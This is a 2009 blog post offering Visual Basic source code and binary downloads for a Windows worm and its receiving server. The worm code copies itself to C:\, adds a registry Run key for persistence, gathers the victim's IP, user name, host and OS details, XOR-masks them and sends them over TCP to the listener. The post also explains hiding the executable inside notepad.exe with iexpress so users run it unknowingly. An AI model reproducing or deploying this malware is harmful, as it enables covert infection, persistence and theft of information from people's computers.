Now that Vista leaves and people is willing to install Seven hoping UAC is no longer there, Im sure that Windows users will always get what they want. Usability and insecurity. Many, many people make money thanks to the Windows XP insecurity. Regular users saving a lot of time and, malicious users infecting the formers. Great scenario, keeping the money moving.
Here is an example of this business. A computer worm. Yep, this can be used to harm computers, spread payloads, information disclosure... and for educational purposes.
Risk disclaimer: (Please read very carefully)
There is no guarantees for the currency or accuracy of information are made. bilbaodigital.es's information is provided "as is", without warranty of any kind, whether expressed or implied. bilbaodigital.es and its authors make no guarantee and hold no responsibility for any damage, injury, loss of property, loss of data, loss of any and all resources, or any negative influence what-so-ever, that may result from any and all usage of the information found on bilbaodigital.es, or linked from bilbaodigital.es (including but not limited to bilbaodigital.es's articles). This includes but is not limited to downloadable software on bilbaodigital.es.
Negative consequences of your usage of the bilbaodigital.es website are solely your problem and your responsibility. All consequences of the usage of bilbaodigital.es do not involve bilbaodigital.es and its authors, at all, ever. You hold full responsibility for your actions.
Use bilbaodigital.es's information resources at your own risk.
Download Worm (replicates, modifies registry, encrypts and sends infromation) - md5 hash 5479efa37350f2c63dfd874e450fdc3f - virustotal.com results
Download Server (listens, waits for myworm.exe transmision and decrypts data) - md5 hash 6ae27d05ce325fdfb6da310b4b219c4b - virustotal.com results
15/12/2009
These five steps have been considered while developing this Visual Basic worm code.
1In a layer 8 error an user executes the malicious file.
First step from the victim point of view but last for developers. Iexpress.exe is a Windows tool that can be used to bind/join two executables and automatically run the programs contained inside. You can distribute any exe (myworm.exe) within a well know application (notepad.exe). Self-explanatory.
2Once done it replicates. Self copy to other filesystems.
Now the code must guarantee survival, copying itself to another location with different names/properties:
Dim nombre_archivo As String = System.IO.Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName)
Dim archivo_origen As String = Process.GetCurrentProcess().MainModule.FileName
Dim archivo_destino As String = "C:\" + nombre_archivo
Private Sub copia()
If System.IO.File.Exists(archivo_destino) = False Then
System.IO.File.Copy(archivo_origen, archivo_destino)
MsgBox("File copied")
End If
End Sub
3Runs on startup, grants access via OS registry.
To execute the code on computer startup we can modify the registry:
Dim key As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
Private Sub registro()
If key.GetValue(nombre_archivo) = "" Then
key.SetValue(nombre_archivo, "C:\myworm.EXE")
MsgBox("Registry added")
End If
End Sub
4Gathers information about users, computers and networks.
Now, you can read any file from the computer, obtain information provided by the programming language, ...
- Public IP
Dim plaindata As String
Function whatismyip()
Dim uri As New Uri("http://www.whatismyip.org/")
Dim request As WebRequest = WebRequest.Create(uri)
Dim response As WebResponse = request.GetResponse()
Dim stream As Stream = response.GetResponseStream()
Dim reader As New StreamReader(stream)
Dim myIP As String = reader.ReadToEnd()
reader.Close()
stream.Close()
Return myIP
End Function
plaindata = ("IP Pública: " + whatismyip())
plaindata = plaindata + (" Nombre equipo/usuario: " + Environment.UserDomainName + "/" + Environment.UserName)
plaindata = plaindata + (" Información del equipo: " + Dns.GetHostName)
plaindata = plaindata + (" SO/Versión: " + My.Computer.Info.OSFullName + "/" + My.Computer.Info.OSVersion)
plaindata = plaindata + (" Idioma/Código: " + My.Computer.Info.InstalledUICulture.DisplayName + "/" + My.Computer.Info.InstalledUICulture.Name)
plaindata= plaindata + (" Hora: " + My.Computer.Clock.LocalTime)
5Sends this information encrypted to a specific host/port using a TCP client-server arquitecture.
We can encrypt this information before sending to another host with a simple XOR translation.
Function XorString(ByVal targetString As String, ByVal maskValue As String) As String
Dim Index As Integer = 0
Dim ReturnValue As String = ""
For Each CharValue As Char In targetString.ToCharArray
ReturnValue = String.Concat(ReturnValue, Chr(Asc(CharValue) Xor Asc(maskValue.Substring(Index, 1))))
Index = (Index + 1) Mod maskValue.Length
Next
Return ReturnValue
End Function
Dim encrypteddata = XorString(plaindata, "01010101")
Now this information can be transferred to a specific port using a TCP client-server arquitecture.Client:
Sub TCPClient()
Dim tcpClient As New System.Net.Sockets.TcpClient
Try
tcpClient.Connect("Localhost", 2009)
Catch e As Exception
Console.WriteLine(e.ToString())
Console.ReadLine()
End Try
Dim networkStream As NetworkStream = tcpClient.GetStream()
If networkStream.CanWrite And networkStream.CanRead Then
' Do a simple write.
Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(infocrypted)
networkStream.Write(sendBytes, 0, sendBytes.Length)
' Read the NetworkStream into a byte buffer.
Dim bytes(tcpClient.ReceiveBufferSize) As Byte
networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
' Output the data received from the host to the console.
Dim returndata As String = Encoding.UTF8.GetString(bytes)
Console.WriteLine("El servidor TCP devuelve: " + returndata.TrimEnd(" "))
Else
If Not networkStream.CanRead Then
Console.WriteLine("Could not write data to data stream")
tcpClient.Close()
Else
If Not networkStream.CanWrite Then
Console.WriteLine("Could not read data from data stream")
tcpClient.Close()
End If
End If
End If
' Pause to let the user view the console output.
Console.ReadLine()
End Sub
Multithread server:
'DnsPermissionAttribute specifies permission to request information from Domain Name Servers.
Class CTestTCPServer
Shared Sub Main()
Const portNumber As Integer = 2009
Dim tcpListener As New TcpListener(portNumber)
tcpListener.Start()
Console.WriteLine("Esperando conexiones de clientes TCP...")
While (True)
Try
'Accept the pending client connection and return a TcpClient for communication.
Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()
Console.WriteLine("Conexión aceptada.-------------------")
' Get the data stream.
Dim networkStream As NetworkStream = tcpClient.GetStream()
' Read the data stream into a byte array.
Dim bytes(tcpClient.ReceiveBufferSize) As Byte
networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
' Return the data received from the client to the console.
Dim clientdata As String = Encoding.UTF8.GetString(bytes)
Dim clientdataplain As String = XorString(clientdata, "01010101")
Console.WriteLine("El cliente ha enviado: " + clientdataplain.TrimEnd("1", "0"))
Dim responseString As String = "Correctamente conectado al servidor TCP."
Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(responseString)
networkStream.Write(sendBytes, 0, sendBytes.Length)
Console.WriteLine(("Mensaje enviado por el servidor TCP: " + responseString))
'Close TcpClient.
tcpClient.Close()
Catch e As Exception
Console.WriteLine(e.ToString())
Console.ReadLine()
End Try
End While
End Sub
Download Worm (replicates, modifies registry, encrypts and sends infromation) - md5 hash 5479efa37350f2c63dfd874e450fdc3f - virustotal.com results
Download Server (listens, waits for myworm.exe transmision and decrypts data) - md5 hash 6ae27d05ce325fdfb6da310b4b219c4b - virustotal.com results
15/12/2009
